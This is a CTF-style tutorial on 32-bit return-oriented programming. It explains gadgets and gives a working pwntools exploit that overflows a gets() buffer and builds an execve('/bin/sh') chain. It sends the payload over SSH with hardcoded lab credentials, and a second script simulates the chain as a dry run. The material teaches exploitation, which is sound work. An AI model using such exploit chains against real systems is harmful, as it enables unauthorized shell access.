Baby ROP

Return-oriented programming (ROP) is an exploitation technique that re-uses code already present in the executable text segment, so the stack never has to be executable and NX does not stop it. It only defeats ASLR when the gadget addresses are known, e.g. in a non-PIE binary like the one here, or after an address leak.

The building block is a GADGET: a short instruction sequence ending in ret. The ret pops the next address off the stack, so after every gadget we still control eip and can chain the next one.

You can find gadgets with rp++ (-r1 limits it to one instruction before the ret); grep for the register you need, e.g. for a 32-bit binary:

rp++ -f bin1 -r1 | grep "pop eax"

This binary reads input with gets, so we overflow the stack buffer, overwrite the saved return address (eip) and chain gadgets that set up and issue the execve("/bin/sh") syscall. Since gets only stops at a newline, none of the packed addresses may contain a 0x0a byte.

NOTE: for the 32-bit execve syscall via int 0x80, eax must hold the syscall number 11, ebx a pointer to "/bin/sh", ecx the argv pointer (0 works on Linux; otherwise a pointer to an array whose first entry points to "/bin/sh", i.e. a pointer to a pointer) and edx the envp pointer (0). The string itself has to be placed somewhere writable at a fixed address, here the .bss section.

```python
from pwn import *

context.bits = 32

pop_eax = 0x0806c1c3  # pop eax ; ret
pop_ebx = 0x080525ee  # pop ebx ; ret
pop_edx = 0x080525c6  # pop edx ; ret
xchg    = 0x08048105  # xchg ecx, eax ; ret
syscall = 0x08052cf0  # int 0x80 ; ret
mov_edx = 0x08079191  # mov dword [edx], eax ; ret
bss     = 0x080ca63c  # writable, fixed address (static, non-PIE binary)

payload  = b"A" * 44                                # pad up to the saved return address
payload += pack(pop_eax) + pack(0)                  # eax = 0
payload += pack(xchg)                               # ecx = 0 (eax gets ecx's old value, set again below)
payload += pack(pop_edx) + pack(bss)                # edx = bss
payload += pack(pop_eax) + b"/bin"                  # eax = '/bin'
payload += pack(mov_edx)                            # [bss] = '/bin'
payload += pack(pop_edx) + pack(bss + 4)            # edx = bss + 4
payload += pack(pop_eax) + b"/sh\x00"               # eax = '/sh\0'
payload += pack(mov_edx)                            # [bss+4] = '/sh\0' -> "/bin/sh\0" at bss
payload += pack(pop_eax) + pack(11)                 # eax = 11 (SYS_execve)
payload += pack(pop_ebx) + pack(bss)                # ebx = pointer to "/bin/sh"
payload += pack(pop_edx) + pack(0)                  # edx = 0 (envp)
payload += pack(syscall)                            # int 0x80 -> execve("/bin/sh", 0, 0)
payload += pack(pop_eax) + pack(1) + pack(syscall)  # eax = 1 (SYS_exit) in case execve fails

s = ssh(host='192.168.56.101', user='level0', password='warmup')
p = s.process('level0')
print(p.recvuntil(b"?"))
p.sendline(payload)
print(p.recvline())
p.interactive()
```
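Before sending a chain like this it is worth dry-running it: the example below is added here and is not part of the original write-up. It rebuilds the same execve chain with plain struct (no pwntools), generalises the string write so any NUL-terminated string is stored four bytes at a time with the pop edx / pop eax / mov [edx], eax gadgets, refuses payloads that contain 0x0a (which gets would truncate), and walks the chain with a tiny interpreter that applies each gadget's semantics to check the register and memory state at the first int 0x80. The gadget addresses, the .bss address and the 44-byte offset are taken from the chain above; the assumption that the xchg gadget ends in ret is the page's.

```python
import struct

# Gadget and data addresses from the write-up's chain (non-PIE, static binary; assumed fixed).
POP_EAX      = 0x0806c1c3  # pop eax ; ret
POP_EBX      = 0x080525ee  # pop ebx ; ret
POP_EDX      = 0x080525c6  # pop edx ; ret
XCHG_ECX_EAX = 0x08048105  # xchg ecx, eax ; ret (assumed to end in ret)
MOV_EDX_EAX  = 0x08079191  # mov dword [edx], eax ; ret
INT80        = 0x08052cf0  # int 0x80 ; ret
BSS          = 0x080ca63c  # writable scratch space for the "/bin/sh" string
OFFSET       = 44          # bytes from the buffer start to the saved return address
SYS_EXIT, SYS_EXECVE = 1, 11


def p32(value):
    """Pack a 32-bit little-endian word, as pwntools' pack() does with context.bits=32."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def write_string(addr, s):
    """Gadgets that store s plus a NUL terminator at addr, one 4-byte word per mov gadget."""
    data = s + b"\x00"
    data += b"\x00" * (-len(data) % 4)          # pad so every pop eax gets a full word
    chain = b""
    for i in range(0, len(data), 4):
        chain += p32(POP_EDX) + p32(addr + i)   # edx = destination of this word
        chain += p32(POP_EAX) + data[i:i + 4]   # eax = the four bytes themselves
        chain += p32(MOV_EDX_EAX)               # [edx] = eax
    return chain


def execve_chain(binsh_addr=BSS):
    """The write-up's chain: execve("/bin/sh", 0, 0) via int 0x80, then exit."""
    chain = p32(POP_EAX) + p32(0) + p32(XCHG_ECX_EAX)   # ecx = 0 (argv); eax is clobbered
    chain += write_string(binsh_addr, b"/bin/sh")
    chain += p32(POP_EAX) + p32(SYS_EXECVE)             # eax = 11
    chain += p32(POP_EBX) + p32(binsh_addr)             # ebx = &"/bin/sh"
    chain += p32(POP_EDX) + p32(0)                      # edx = 0 (envp)
    chain += p32(INT80)
    chain += p32(POP_EAX) + p32(SYS_EXIT) + p32(INT80)  # exit cleanly if execve fails
    return chain


def build_payload(chain, offset=OFFSET):
    """Prefix the padding and reject anything gets() could not deliver intact."""
    payload = b"A" * offset + chain
    if b"\n" in payload:
        raise ValueError("payload contains 0x0a; gets() stops at newline")
    return payload


def simulate(chain):
    """Dry-run the chain with each gadget's semantics; return (regs, mem) at the first int 0x80.

    mem maps byte addresses to byte values, so unaligned or partial stores are visible.
    """
    regs = {"eax": 0, "ebx": 0, "ecx": 0, "edx": 0}
    mem = {}
    words = [struct.unpack("<I", chain[i:i + 4])[0] for i in range(0, len(chain), 4)]
    pc = 0
    while pc < len(words):
        gadget = words[pc]
        pc += 1
        if gadget in (POP_EAX, POP_EBX, POP_EDX):
            reg = {POP_EAX: "eax", POP_EBX: "ebx", POP_EDX: "edx"}[gadget]
            regs[reg] = words[pc]                # the popped value is the next stack word
            pc += 1
        elif gadget == XCHG_ECX_EAX:
            regs["ecx"], regs["eax"] = regs["eax"], regs["ecx"]
        elif gadget == MOV_EDX_EAX:
            for i, b in enumerate(p32(regs["eax"])):
                mem[regs["edx"] + i] = b
        elif gadget == INT80:
            return regs, mem
        else:
            raise ValueError("unknown gadget 0x%08x at word %d" % (gadget, pc - 1))
    raise ValueError("chain never reaches int 0x80")


def read_cstring(mem, addr):
    """Read a NUL-terminated string from the simulated memory (fails if never terminated)."""
    out = b""
    while mem.get(addr, 0) != 0:
        out += bytes([mem[addr]])
        addr += 1
    return out


if __name__ == "__main__":
    regs, mem = simulate(execve_chain())
    print(regs, read_cstring(mem, BSS))
    print(len(build_payload(execve_chain())), "bytes")
```

The simulator only knows the six gadgets it is given, so an address typo in the chain shows up as "unknown gadget" instead of a crash on the target; running it on the real chain should report eax=11, ebx=BSS, ecx=edx=0 and "/bin/sh" at BSS.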